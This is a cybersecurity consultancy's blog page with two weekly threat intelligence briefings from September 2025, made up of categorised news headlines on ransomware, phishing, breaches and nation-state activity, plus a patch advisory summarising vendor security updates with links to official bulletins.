Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.

Black Arrow Admin 14/09/2025 Black Arrow Admin 14/09/2025

Black Arrow Cyber Threat Intelligence Briefing 12 September 2025

Black Arrow Cyber Threat Intelligence Briefing 12 September 2025:

-Qantas Penalises Executives for July Cyber Attack

-Three Critical Facts About Cyber Risk Management

-Pressure on CISOs to Stay Silent About Security Incidents Growing

-Why Security Teams Are Turning to the Dark Web to Protect Executives

-You Should Be Aware of These Latest Social Engineering Trends

-Insider Breaches Are a Bigger Security Threat than Ever Before. Here’s How Your Business Can Stay Safe

-Are Cybercriminals Hacking Your Systems or Just Logging in?

-New Automated Extortion Software Is So Devious You Won't Believe It

-Phishing Kit Unveils New Level of Sophistication

-New Malware Campaigns Highlight Rising AI and Phishing Risks

-Ransomware Kits Built with AI Are Behind a 70% Surge in Attacks

-Ransomware Losses Climb as AI Pushes Phishing to New Heights

Executive Summary

This week’s review highlights the growing personal and organisational consequences of cyber attacks. Qantas cut executive bonuses after a major breach, reflecting increased leadership accountability. CISOs report pressure to conceal incidents, despite legal obligations. Boards are urged to adopt risk-based approaches that prioritise critical exposures.

Threats increasingly target individuals, with executives impersonated using AI and insider breaches causing costly damage. Phishing and ransomware attacks are becoming more sophisticated, using AI, mimicking multi-factor authentication and automating extortion.

These developments reinforce the need for stronger governance, clear accountability and a culture of security awareness. Contact us for guidance on how to achieve this in your organisation.

Governance, Risk and Compliance

Pressure on CISOs to stay silent about security incidents growing | CSO Online

Why security teams are turning to the dark web to protect executives - Digital Journal

71% of CISOs hit with third-party security incident this year | CSO Online

6 hot cybersecurity trends | CSO Online

Lack of visibility creates "cascade" of security risk, says Kiteworks | IT Pro

Three Critical Facts About Cyber Risk Management | Trend Micro (US)

CISOs, stop chasing vulnerabilities and start managing human risk - Help Net Security

Mitigating supply chain vulnerabilities | TechRadar

What’s Your Cybersecurity Maturity? | Trend Micro (US)

CISOs Master Persuasion to Secure Cybersecurity Funding with Data and AI

How Leading CISOs are Getting Budget Approval

Creating a cyber-first culture through strategic governance | TechRadar

Threats

Ransomware, Extortion and Destructive Attacks

Remote Access Abuse Biggest Pre-Ransomware Indicator - Infosecurity Magazine

Report: Ransomware Attacks Costlier as Threat Actors Become More Systemic

Ransomware kits built with AI are behind a 70% surge in attacks

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

New Automated Extortion Software Is So Devious You Won't Believe It

Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures Revealed | Trend Micro (US)

Akira ransomware crims abusing trifecta of SonicWall flaws • The Register

The crazy, true story behind the first AI-powered ransomware • The Register

New fugitive uploaded to EU Most Wanted list for major ransomware attacks - A reward of up to USD 10 million is being offered for any information leading to his arrest | Europol

Ransomware attacks fewer but costlier - report | Insurance Business America

Most pandemic-era ransomware raids conducted by two gangs - iTnews

Ransomware Victims

Jaguar Land Rover 'working around the clock' to restore IT systems following Sunday's cyber attack | This is Money

Disruption to Jaguar Land Rover after cyber-attack may last until October | Jaguar Land Rover | The Guardian

Cyberattack on Jaguar Land Rover threatens to hit British economic growth | The Record from Recorded Future News

Jaguar Land Rover in 'truly horrible position' following cyber attack - CoventryLive

Concerns over impact of JLR cyber attack - BBC News

LunaLock Ransomware threatens victims by feeding stolen data to AI models

DZ Bank’s subsidiary says hackers lied about stolen data | Cybernews

Jaguar Land Rover Admits Data Breach Caused by Recent Cyberattack - SecurityWeek

Tata Motors shares in focus after JLR faces cybersecurity breach - The Economic Times

JLR Got Hacked So Bad They’re Still Registering Cars With Pen And Paper | Carscoops

Nevada's sex offender, restraining order databases hit in cyberattack, hobbling law enforcement - The Nevada Independent

Car part supplier's fears over Jaguar Land Rover cyber-attack - BBC News

Legal Aid Agency to begin restoring digital services in coming days, minister says – PublicTechnology

M&S tech chief leaves months after cyber attack cost it £300m | Money News | Sky News

Ransomware attack at blood center: Org tells users their data's been stolen | Malwarebytes

Lovesac warns customers their data was breached after suspected RansomHub attack six months ago

100,000 Impacted by Cornwell Quality Tools Data Breach - SecurityWeek

Panama Ministry of Economy discloses breach claimed by INC ransomware

Phishing & Email Based Attacks

Salty2FA Phishing Kit Unveils New Level of Sophistication - Infosecurity Magazine

Emerging Phishing Threats: MostereRAT, ClickFix, and State-Sponsored Risks

From MostereRAT to ClickFix: New Malware Campaigns Highlight Rising AI and Phishing Risks

Critical 0-Click Vulnerability Enables Attackers to Takeover Email Access Using Punycode

You Didn't Get Phished — You Onboarded the Attacker

iCloud Calendar abused to send phishing emails from Apple’s servers

AI-Powered Phishing Attack Targets Microsoft 365 Accounts, Experts Warn | Ubergizmo

Noisy Bear Targets Kazakhstan Energy Sector With BarrelFire Phishing Campaign

Business Email Compromise (BEC)/Email Account Compromise (EAC)

Jeremy Clarkson reveals hackers stole £27,000 from his Cotswolds pub | The Standard

Other Social Engineering

You Didn't Get Phished — You Onboarded the Attacker

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

New Automated Extortion Software Is So Devious You Won't Believe It

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

You should be aware of these latest social engineering trends | CSO Online

Salesloft Drift Cyberattack Ups Social Engineering Attack Concerns

What is SIM-swapping fraud and what are the signs? - BBC News

Fake employers from North Korea hack hundreds | Cybernews

Beware the QR code: How a new scam is costing consumers £10,000 per day | The Independent

Fraud, Scams and Financial Crime

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

Fake employers from North Korea hack hundreds | Cybernews

US sanctions companies and individuals behind Southeast Asian scam centers | Crime News | Al Jazeera

Working with partners to tackle cyber crime and fraud - GOV.UK

Artificial Intelligence

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

Ransomware kits built with AI are behind a 70% surge in attacks

LunaLock Ransomware threatens victims by feeding stolen data to AI models

Employees keep feeding AI tools secrets they can't take back - Help Net Security

How AI Puts Company Data at Risk | Kiplinger

AI agents are here, now comes the hard part for CISOs - Help Net Security

CISOs brace for a new kind of AI chaos - Help Net Security

AI-Powered Phishing Attack Targets Microsoft 365 Accounts, Experts Warn | Ubergizmo

AI-powered malware hit 2,180 GitHub accounts in “s1ngularity” attack

Securing AI Models Against Adversarial Attacks in Financial Applications - Security Boulevard

Stealthy attack serves poisoned web pages only to AI agents - Help Net Security

Threat Actor Accidentally Exposes AI-Powered Operations - Infosecurity Magazine

Identity management was hard, AI made it harder - Help Net Security

Deepfakes are rewriting the rules of geopolitics - Help Net Security

AI is everywhere, but scaling it is another story - Help Net Security

The crazy, true story behind the first AI-powered ransomware • The Register

Anthropic Bans Chinese Entities from Claude AI Over Security Risks

2FA/MFA

Salty2FA Phishing Kit Unveils New Level of Sophistication - Infosecurity Magazine

6 ways to identify fake 2FA prompts and protect your accounts

Azure mandatory multifactor authentication: Phase 2 starting in October 2025 | Microsoft Azure Blog

Malware

macOS Stealer Campaign Uses “Cracked” App Lures to Bypass Apple Securi - Infosecurity Magazine

Secretive MaaS Group Spreads Novel 'CastleRAT'

Malicious npm Packages Steal Ethereum Keys in Typosquatting Attack

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Atomic Stealer Disguised as Cracked Software Attacking macOS Users

'MostereRAT' Blends In, Blocks Security Tools

AsyncRAT Exploits ConnectWise ScreenConnect to Steal Credentials and Crypto

Hackers left empty-handed after massive NPM supply-chain attack

Vidar Infostealer Back With a Vengeance

Fileless Malware Deploys Advanced RAT via Legitimate Tools - Infosecurity Magazine

AI-powered malware hit 2,180 GitHub accounts in “s1ngularity” attack

Russian Threat Group Targets Microsoft Outlook With Malware | Security Magazine

Chinese APT Actor Compromises Military Firm with Novel Fileless Malware - Infosecurity Magazine

Bots/Botnets

Exposed Docker APIs Likely Exploited to Build Botnet - SecurityWeek

Mobile

New Android RAT uses Near Field Communication to automatically steal money from devices | TechRadar

What is SIM-swapping fraud and what are the signs? - BBC News

New RatOn Android Malware Targets Banking Apps and Crypto Wallets via NFC Attacks

Apple Warns Of Series Mercenary Spyware Attacks Targeting Users Devices

Is WhatsApp Still Safe? Security Experts Weigh In After Zero-Day - ClearanceJobs

Ex-WhatsApp security boss sues Meta, alleging it ignored privacy flaws - The Washington Post

Is your phone actually listening in on you? The answer is complicated

Russia targets WhatsApp and pushes new 'super-app' as internet blackouts grow - BBC News

Traveling soon? 5 simple ways I thwart phone thieves - and you can too | ZDNET

Apple’s new Memory Integrity Enforcement system deals a huge blow to spyware developers | CyberScoop

Denial of Service/DoS/DDoS

DDoS scrubbing service ironic target of massive attack it was built to prevent — hit with 1.5 billion packets per second from more than 11,000 distributed networks | Tom's Hardware

Internet of Things – IoT

How Has IoT Security Changed Over the Past 5 Years?

70% of smart home devices vulnerable to cyberattacks: Cyber Security Council

Connected cars are racing ahead, but security is stuck in neutral - Help Net Security

7 Vulnerable IoT Devices: Hacking Risks and Security Tips

Hacking driverless vehicles: Researchers prepare for the worst while embracing autonomous cars | The National

Data Breaches/Leaks

Qantas penalizes executives for July cyberattack | The Record from Recorded Future News

61% of US Companies Hit by Insider Data Breaches - Infosecurity Magazine

Insider breaches are a bigger security threat than ever before - here's how your business can stay safe | TechRadar

Salesloft Drift Cyberattack Ups Social Engineering Attack Concerns

More Cybersecurity Firms Hit by Salesforce-Salesloft Drift Breach - SecurityWeek

Salesloft GitHub Account Compromised Months Before Salesforce Attack - SecurityWeek

UK Electoral Commission finally recovered from China hack after three years and £250,000 grant | TechRadar

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Financial services firm Wealthsimple discloses data breach

Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack

Over 6,700 Private Repositories Made Public in Nx Supply Chain Attack - SecurityWeek

Qualys Confirms Data Breach - Hackers Accessed Salesforce Data in Supply Chain Attack

Tenable Confirms Data Breach - Hackers Accessed Customers Contact Details

France: Three Regional Healthcare Agencies Targeted by Cyber-Attacks - Infosecurity Magazine

VC giant Insight Partners notifies staff and limited partners after data breach | TechCrunch

Pentagon left livestream keys exposed, hijack risk included • The Register

Call audio from gym members, employees in open database • The Register

Everything we know about the Plex data breach so far | IT Pro

LNER urges customers to be vigilant after passenger details accessed in cyber-attack | Rail industry | The Guardian

Irish League of Credit Unions is 'enhancing cybersecurity' after attack

100,000 Impacted by Cornwell Quality Tools Data Breach - SecurityWeek

Panama Ministry of Economy discloses breach claimed by INC ransomware

Plex tells users to reset passwords after new data breach

PSNI 'cannot afford' to pay staff compensation over data breach - BBC News

Organised Crime & Criminal Actors

US sanctions companies and individuals behind Southeast Asian scam centers | Crime News | Al Jazeera

Threat Actor Accidentally Exposes AI-Powered Operations - Infosecurity Magazine

Kosovo hacker pleads guilty to running BlackDB cybercrime marketplace

Bulletproof Host Stark Industries Evades EU Sanctions – Krebs on Security

Huntress's attacker surveillance splits infosec community • The Register

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

New Android RAT uses Near Field Communication to automatically steal money from devices | TechRadar

New RatOn Android Malware Targets Banking Apps and Crypto Wallets via NFC Attacks

Malicious npm Packages Steal Ethereum Keys in Typosquatting Attack

Hackers left empty-handed after massive NPM supply-chain attack

Hackers abuse TOR network and misconfigured Docker APIs to steal crypto - so keep an eye on your wallet | TechRadar

Insider Risk and Insider Threats

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

61% of US Companies Hit by Insider Data Breaches - Infosecurity Magazine

Insider breaches are a bigger security threat than ever before - here's how your business can stay safe | TechRadar

You Didn't Get Phished — You Onboarded the Attacker

Fake employers from North Korea hack hundreds | Cybernews

CISOs, stop chasing vulnerabilities and start managing human risk - Help Net Security

Students Pose Inside Threat to Education Sector

Supply Chain and Third Parties

71% of CISOs hit with third-party security incident this year | CSO Online

Hackers left empty-handed after massive NPM supply-chain attack

Mitigating supply chain vulnerabilities | TechRadar

Supply Chain Challenges and Solutions Outlined in Capgemini Report

Salesloft Breached via GitHub Account Compromise

Salesloft GitHub Account Compromised Months Before Salesforce Attack - SecurityWeek

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack

Over 6,700 Private Repositories Made Public in Nx Supply Chain Attack - SecurityWeek

Qualys Confirms Data Breach - Hackers Accessed Salesforce Data in Supply Chain Attack

Tenable Confirms Data Breach - Hackers Accessed Customers Contact Details

Cloud/SaaS

Microsoft now enforces MFA on Azure Portal sign-ins for all tenants

Azure mandatory multifactor authentication: Phase 2 starting in October 2025 | Microsoft Azure Blog

AI-Powered Phishing Attack Targets Microsoft 365 Accounts, Experts Warn | Ubergizmo

Microsoft's China cloud condundrum - Tech Monitor

Outages

Ransomware, vendor outages, and AI attacks are hitting harder in 2025 - Help Net Security

Microsoft fixes Exchange Online outage affecting users worldwide

Identity and Access Management

Are cybercriminals hacking your systems – or just logging in?

Identity management was hard, AI made it harder - Help Net Security

Encryption

Nearly 500 researchers urge EU to rethink controversial CSAM scanning proposal - Help Net Security

The New Math of Quantum Cryptography | WIRED

Brussels faces privacy crossroads over encryption backdoors • The Register

Passwords, Credential Stuffing & Brute Force Attacks

Are cybercriminals hacking your systems – or just logging in?

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

When typing becomes tracking: Study reveals widespread silent keystroke interception - Help Net Security

Everything we know about the Plex data breach so far | IT Pro

Plex tells users to reset passwords after new data breach

Social Media

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Malvertising

Beware of Malicious Facebook Ads With Meta Verified Steals User Account Details

Ongoing malvertising campaign targets European IT workers with fake GitHub Desktop installers - Help Net Security

Regulations, Fines and Legislation

UK toughens Online Safety Act with ban on self-harm content • The Register

False Claims Act Expands to Cybersecurity Settlements

The Expanding Scope of FCA-Cybersecurity Liability | Sheppard Mullin Richter & Hampton LLP - JDSupra

CISA pushes final cyber incident reporting rule to May 2026 | CyberScoop

Experts poke holes in UK online safety regs • The Register

Brussels faces privacy crossroads over encryption backdoors • The Register

US politicians ponder Wimwig cyber intel sharing law | Computer Weekly

Banks warn of risks as critical cyber law nears expiration | American Banker

UK delays introducing new cybersecurity legislation, again | The Record from Recorded Future News

Trump Cuts Imperil Private Sector Cybersecurity Cooperation

Nearly 500 researchers urge EU to rethink controversial CSAM scanning proposal - Help Net Security

Patchy cyber workforce efforts face uncertain future under Trump

US government lacks clarity into its infosec workforce • The Register

White House cyber office calls for ‘whole of nation’ effort to deter nation-state hackers - Nextgov/FCW

CISA work not ‘degraded’ by Trump administration cuts, top agency official says | CyberScoop

Your Internet Access Is at Risk. We’re Speaking Up - Internet Society

The Newly Named Department Of War Goes To War On Cyber With 48 CFR Rule

Department of War Announces the Final Defense Federal Acquisition Regulation Supplement Rule Implementing the Cybersecurity Maturity Model Certification Program > U.S. Department of War > Release

Models, Frameworks and Standards

The Expanding Scope of FCA-Cybersecurity Liability | Sheppard Mullin Richter & Hampton LLP - JDSupra

CISA pushes final cyber incident reporting rule to May 2026 | CyberScoop

Careers, Working in Cyber and Information Security

CSO hiring on the rise: How to land a top security exec role | CSO Online

Law Enforcement Action and Take Downs

Kosovo hacker pleads guilty to running BlackDB cybercrime marketplace

Misinformation, Disinformation and Propaganda

Deepfakes are rewriting the rules of geopolitics - Help Net Security

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Chinese APT Actor Compromises Military Firm with Novel Fileless Malwar - Infosecurity Magazine

China went to 'EggStreme' lengths to attack Philippines • The Register

China

Elections watchdog admits 'painful lessons learned' after Chinese hack - BBC News

AI-powered penetration tool downloaded 10K times • The Register

Chinese APT Actor Compromises Military Firm with Novel Fileless Malwar - Infosecurity Magazine

Microsoft's China cloud condundrum - Tech Monitor

Chinese Spies Impersonated US Lawmaker to Deliver Malware to Trade Groups: Report - SecurityWeek

45 New Domains Linked to Salt Typhoon, UNC4841

'We have to act' on China, says Trump cybersecurity adviser | The National

American Security Systems are Compromised by China | RealClearDefense

China’s ‘Typhoons’ changing the way FBI hunts sophisticated threats | CyberScoop

China went to 'EggStreme' lengths to attack Philippines • The Register

Anthropic Bans Chinese Entities from Claude AI Over Security Risks

Czech cyber agency NUKIB flags Chinese espionage risks to critical infrastructure

NASA bars Chinese citizens from its facilities, networks • The Register

US tech firms ‘enabled China’s surveillance state’

Chinese companies and bosses to face major fines over cybersecurity incidents | The Record from Recorded Future News

Russia

Russian Offensive Cyber Operations: Analyzing Putin’s Foreign Policy Actions | Security Magazine

Russian Threat Group Targets Microsoft Outlook With Malware | Security Magazine

Russia targets WhatsApp and pushes new 'super-app' as internet blackouts grow - BBC News

Bulgaria U-turns on claim Moscow jammed GPS of von der Leyen's plane | Euronews

North Korea

Exclusive: How North Korean hackers are using fake job offers to steal cryptocurrency | Reuters

You Didn't Get Phished — You Onboarded the Attacker

Fake employers from North Korea hack hundreds | Cybernews

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

The US is now the largest investor in commercial spyware - Ars Technica

Tools and Controls

Critical 0-Click Vulnerability Enables Attackers to Takeover Email Access Using Punycode

Remote Access Abuse Biggest Pre-Ransomware Indicator - Infosecurity Magazine

Why security teams are turning to the dark web to protect executives - Digital Journal

Windows Defender Vulnerability Allows Service Hijacking and Disablement via Symbolic Link Attack

Cyber resilience matters as much as cyber defence - NCSC.GOV.UK

CISOs, stop chasing vulnerabilities and start managing human risk - Help Net Security

'Gentlemen' Ransomware Abuses Vulnerable Driver

Three Critical Facts About Cyber Risk Management | Trend Micro (US)

A CISO’s guide to monitoring the dark web | CSO Online

CISO's guide to security vendor consolidation | TechTarget

Microsoft Warns of Active Directory Domain Services Vulnerability, Let Attackers Escalate Privileges

AI-powered penetration tool downloaded 10K times • The Register

Identity management was hard, AI made it harder - Help Net Security

How attackers weaponize communications networks - Help Net Security

How CIOs can steer legacy tech overhauls | CIO Dive

How Leading CISOs are Getting Budget Approval

Reports Published in the Last Week

Cyber resilience of UK digital infrastructure - POST

Other News

Working with partners to tackle cyber crime and fraud - GOV.UK

MeetC2 - A serverless C2 framework that leverages Google Calendar APIs as a communication channel

Multiple undersea cable cuts in the Red Sea, hampering internet performance — international cables connecting Europe, Asia, and the Middle East are compromised | Tom's Hardware

Firmware is the weak link in your PC's security. Here's how to stay safe | PCWorld

'Solid as a paper Whopper wrapper in the rain': Hackers reported 'catastrophic' cybersecurity flaws at Burger King before the fast food giant nuked their criticism off the 'net via DMCA | PC Gamer

PayPal hacked? Here's how to regain control | PCWorld

Surge in networks scans targeting Cisco ASA devices raise concerns

Staff want compensation after summer cyber-attack

Cyberattacks against schools driven by a rise in student hackers, ICO warns | The Record from Recorded Future News

Attackers test the limits of railway cybersecurity - Help Net Security

Attackers are coming for drug formulas and patient data - Help Net Security

Vulnerability Management

Windows 10 losing security support in October – 6 ways to solve the problem - Which?

The Critical Failure in Vulnerability Management

Microsoft gives Windows 10 its penultimate update - but saves the best for Windows 11 | ZDNET

Vulnerabilities

Microsoft Patch Tuesday security updates for September 2025 fixed two zero-day flaws

Critical 0-Click Vulnerability Enables Attackers to Takeover Email Access Using Punycode

Windows Defender Vulnerability Allows Service Hijacking and Disablement via Symbolic Link Attack

Microsoft Warns of Active Directory Domain Services Vulnerability, Let Attackers Escalate Privileges

Akira ransomware crims abusing trifecta of SonicWall flaws • The Register

Critical SAP S/4HANA vulnerability now exploited in attacks

Top CMS Sitecore patches critical zero-day flaw being hit by hackers | TechRadar

Adobe Patches Critical ColdFusion and Commerce Vulnerabilities - SecurityWeek

Fortinet, Ivanti, Nvidia Release Security Updates - SecurityWeek

Microsoft, Adobe, SAP deliver critical fixes for September 2025 Patch Tuesday - Help Net Security

Cisco Patches High-Severity IOS XR Vulnerabilities - SecurityWeek

Windows 10 losing security support in October – 6 ways to solve the problem - Which?

'Gentlemen' Ransomware Abuses Vulnerable Driver

SAP Patches Critical NetWeaver (CVSS Up to 10.0) and High-Severity S/4HANA Flaws

Microsoft, Adobe, SAP deliver critical fixes for September 2025 Patch Tuesday - Help Net Security

Microsoft: Anti-spam bug blocks links in Exchange Online, Teams

Microsoft gives Windows 10 its penultimate update - but saves the best for Windows 11 | ZDNET

Sector Specific

Industry specific threat intelligence reports are available.

· Automotive

· Construction

· Critical National Infrastructure (CNI)

· Defence & Space

· Education & Academia

· Energy & Utilities

· Estate Agencies

· Financial Services

· FinTech

· Food & Agriculture

· Gaming & Gambling

· Government & Public Sector (including Law Enforcement)

· Health/Medical/Pharma

· Hotels & Hospitality

· Insurance

· Legal

· Manufacturing

· Maritime & Shipping

· Oil, Gas & Mining

· OT, ICS, IIoT, SCADA & Cyber-Physical Systems

· Retail & eCommerce

· Small and Medium Sized Businesses (SMBs)

· Startups

· Telecoms

· Third Sector & Charities

· Transport & Aviation

· Web3

Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.

Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.

You can also follow us on Facebook, Twitter and LinkedIn.

Black Arrow Admin 10/09/2025 Black Arrow Admin 10/09/2025

Black Arrow Cyber Advisory - 10 September 2025 - Security Updates from Microsoft, Adobe, Ivanti, SAP, Fortinet & NVIDIA

Black Arrow Cyber Advisory 10 September 2025 - Security Updates from Microsoft, Adobe, Ivanti, SAP, Fortinet & NVIDIA

Executive Summary

September’s security updates address a wide spectrum of enterprise risks. Microsoft patched critical flaws across Windows, Office, and Azure, while Adobe issued nine product advisories. SAP released 21 new notes, including several high impact NetWeaver and S/4HANA issues. NVIDIA fixed firmware flaws in DGX/HGX platforms. Fortinet disclosed two medium severity vulnerabilities in FortiDDoS F and FortiWeb. Ivanti published 13 vulnerabilities, 11 affecting Connect Secure, Policy Secure, ZTA and Neurons gateways, and 2 in Endpoint Manager, underscoring the importance of promptly securing VPN appliances and management servers. Collectively, these updates emphasise timely patching of Internet facing and business critical systems.

Vulnerabilities by Vendor

Microsoft[¹]: 86 vulnerabilities on the official September 2025 Security Update Guide release page, affecting Windows, Microsoft Edge (Chromium-based), Office, .NET/Developer Tools, and Azure components. Prioritise any items rated Critical, privilege escalation chains, and entries marked by Microsoft as “Exploited.”
Adobe[²]: 9 updates released to address vulnerabilities published on September 9 bulletins (Acrobat Reader, After Effects, Premiere Pro, Commerce, Substance 3D Viewer/Modeler, Experience Manager, Dreamweaver, ColdFusion). Prioritise server- or Internet-facing workloads (Commerce, ColdFusion) and high-impact desktop estates (Acrobat Reader).
Ivanti[³]: 13 vulnerabilities, comprising 11 in Connect Secure, Policy Secure, ZTA Gateways, and Neurons for Secure Access (five high, six medium) and 2 in Endpoint Manager (EPM 2024 SU3 / 2022 SU8) (both high-severity remote code execution requiring user interaction). No exploitation is reported. Prioritise patching Internet-facing gateway appliances and centralised EPM servers; also follow Ivanti’s guidance to avoid exposing admin portals to the Internet.
SAP[⁴]: 21 vulnerabilities in Security Notes on 9 September, affecting core platforms including NetWeaver, S/4HANA, Business One, LT Replication Server, Fiori, and BusinessObjects, among others. Prioritise Critical NetWeaver issues and high severity input validation and authentication weaknesses in S/4HANA and LT.
Fortinet[⁵]: 2 vulnerabilities, affecting FortiDDoS-F (OS command injection, CVSS 6.5) and FortiWeb (path traversal, CVSS 4.7). Both are medium-severity but exploitable by privileged or authenticated users. Prioritise updates for Internet-facing FortiWeb deployments and ensure FortiDDoS-F appliances are upgraded to fixed releases.
NVIDIA[⁶]: 2 vulnerabilities in HGX/DGX vBIOS and LS10 components (CVE-2025-23301, CVE-2025-23302). Prioritise firmware updates in AI/accelerator infrastructure (DGX/HGX), especially shared or multi-tenant environments.

What’s the risk to me or my business?

What can I do?

Footnotes:
¹ Microsoft Security Update Guide (September 2025 release): https://msrc.microsoft.com/update-guide/releaseNote/2025-Sep
² Adobe Security Bulletins and Advisories: https://helpx.adobe.com/security/security-bulletin.html
³ Ivanti September 2025 Security Update: https://www.ivanti.com/blog/september-2025-security-update
⁴ SAP Security Patch Day September 2025: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/september-2025.html
⁵ Fortinet PSIRT Advisories: https://www.fortiguard.com/psirt/FG-IR-25-512 ; https://www.fortiguard.com/psirt/FG-IR-24-344
⁶ NVIDIA Security Bulletin: NVIDIA HGX and DGX VBIOS and LS10 – September 2025: https://nvidia.custhelp.com/app/answers/detail/a_id/5674/~/security-bulletin%3A-nvidia-hgx-and-dgx-vbios-and-ls10---september-2025

Black Arrow Admin 07/09/2025 Black Arrow Admin 07/09/2025

Black Arrow Cyber Threat Intelligence Briefing 05 September 2025

Black Arrow Cyber Threat Intelligence Briefing 05 September 2025:

-Workers Told to Stay Home as Jaguar Land Rover Grapples with Attack: Manufacturing Shut Down, Sales Halted

-AI-Powered Cyber Crime Raises Worldwide Alarm Bells

-DDoS Attacks Serve as Instruments of Political Influence and Disruption

-Phishing Emails Are Getting Smarter and Using Some New Tricks to Snare Victims

-If You’re Using Microsoft Teams or Zoom, Beware: Hackers Could Be Targeting Your Company

-AI Impersonation Scams Are Sky-Rocketing in 2025 – Here’s How to Stay Safe

-Warning as 60% of Financial Attacks Start with Stolen Credentials

-Security Experts Call for Better ‘Offboarding’ Practices amid Spate of Insider Attacks by Outgoing Staff

-Boards Are Being Told to Rethink Their Role in Cyber Security

-Vibe Coding Creates Great Apps with Lax Security. But There Are Ways Around That.

-State-Sponsored Hackers Behind Majority of Vulnerability Exploits

Executive Summary

This week’s review shows attackers continuing to disrupt operations through ransomware and large-scale attacks, with Jaguar Land Rover’s shutdown illustrating the ripple effect of a single breach. DDoS attacks are increasingly weaponised for political influence, amplified by AI-driven automation. At the same time, attackers continue to exploit human weaknesses: smarter phishing kits, fake Teams and Zoom invites, and AI-powered impersonation scams are targeting employees, while credential theft and poor offboarding practices remain major risks.

AI is also reshaping the threat landscape, enabling automated ransomware campaigns and deepfake-enabled fraud, while introducing new compliance challenges through AI-driven development. Boards are being urged to embed security into innovation and financial processes, and nation-state actors continue to exploit vulnerabilities in critical infrastructure.

These trends highlight the need for strong governance, technical and identity controls, and a culture of security awareness. Contact us to discuss proportionate ways to achieve this in your organisation.

Governance, Risk and Compliance

Security experts call for better 'offboarding' practices amid spate of insider attacks by outgoing staff | IT Pro

Cybercrime increasingly moving beyond financial gains | CSO Online

How Firms Can Keep Cybersecurity Top of Mind | SC Media UK

Boards are being told to rethink their role in cybersecurity - Help Net Security

Software is 40% of security budgets as CISOs shift to AI defense | VentureBeat

Gen Z has a cyber hygiene problem | IT Pro

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Group Exploits Hybrid Cloud Gaps, Gains Full Azure Control in Enterprise Attacks - SecurityWeek

Ransomware gang takedowns causing explosion of new, smaller groups | The Record from Recorded Future News

Hackers claim responsibility for cyber-attack on Jaguar Land Rover, as new research shows the cost of security breaches to online retailers - InternetRetailing

JLR attack: How ransomware gangs have changed from cartels to cliques

Hackers Exploit Microsoft Teams to Taunt Victims and Demand Ransoms

How insurer strategies are evolving in response to the ransomware surge

Salesforce attackers threaten Google, FBI | Cybernews

What are ShinyHunters, the hackers that attacked Google? Should we all be worried?

Hacker Impatience Can Be a Good Thing

When Browsers Become the Attack Surface: Rethinking Security for Scattered Spider

New Dire Wolf Ransomware Attack Windows Systems, Deletes Event Logs and Backup-Related Data

Hook v3 unleashes a shocking arsenal of ransomware overlays, fake banking prompts, spyware functions, and real-time device monitoring | TechRadar

Ransomware payments are banned in the public sector: should businesses still pay? | IT Pro

Hackers Exploit Third-Party SonicWall SSL VPNs to Deploy Sinobi Ransomware: By Parminder Saini

Here's how ransomware crims are abusing AI tools • The Register

Prolific Russian ransomware operator living in California enjoys rare leniency awaiting trial | CyberScoop

Ransomware Victims

JLR attack: How ransomware gangs have changed from cartels to cliques

M&S hackers claim responsibility for Jaguar Land Rover attack

Jaguar Land Rover factory workers told to stay home until at least Tuesday as car maker grapples with cyber attack | This is Money

Sweden scrambles after ransomware attack puts sensitive worker data at risk

Nevada Confirms Ransomware Attack Behind Statewide Service Disruptions - SecurityWeek

M&S hackers suspects in Legal Aid Agency cyber-attack - Retail Gazette

Jaguar Land Rover says cyberattack ‘severely disrupted’ production

Dealerships unable to sell Range Rovers after JLR cyber attack

Ransomware attack shuts down Nevada Insurance Division website | Insurance Business America

Ransomware Attack on Pennsylvania’s AG Office Disrupts Court Cases - Infosecurity Magazine

Tire giant Bridgestone confirms cyberattack impacts manufacturing

Fired ChangeNOW worker wants hackers to pay| Cybernews

Phishing & Email Based Attacks

Phishing emails are getting smarter - and using some new tricks to snare victims | TechRadar

The Rise of BEC Attacks Targeting Government Agencies | Proofpoint US

The Old Ways Are Still the Best for Most Cybercriminals

New Phishing Attack Via OneDrive Attacking C-level Employs for Corporate Credentials

Tycoon Phishing Kit Utilizes New Capabilities to Hide Malicious Links - Infosecurity Magazine

Cybersecurity experts issue urgent warning amid surge in Stealerium malware attacks | IT Pro

Phishing Empire Runs Undetected on Google, Cloudflare

North Korean Hackers Exploit Threat Intel Platforms For Phishing - Infosecurity Magazine

DocuSign and Apple Pay Phishing Scam Steals User Credentials

North Korean Hackers Weaponize Seoul Intelligence Files - Infosecurity Magazine

VirusTotal Finds 44 Undetected SVG Files Used to Deploy Base64-Encoded Phishing Pages

What to do if your email has been hacked | Tom's Guide

Venus Protocol Recovers $13.5M in Phishing Attack

Business Email Compromise (BEC)/Email Account Compromise (EAC)

The Rise of BEC Attacks Targeting Government Agencies | Proofpoint US

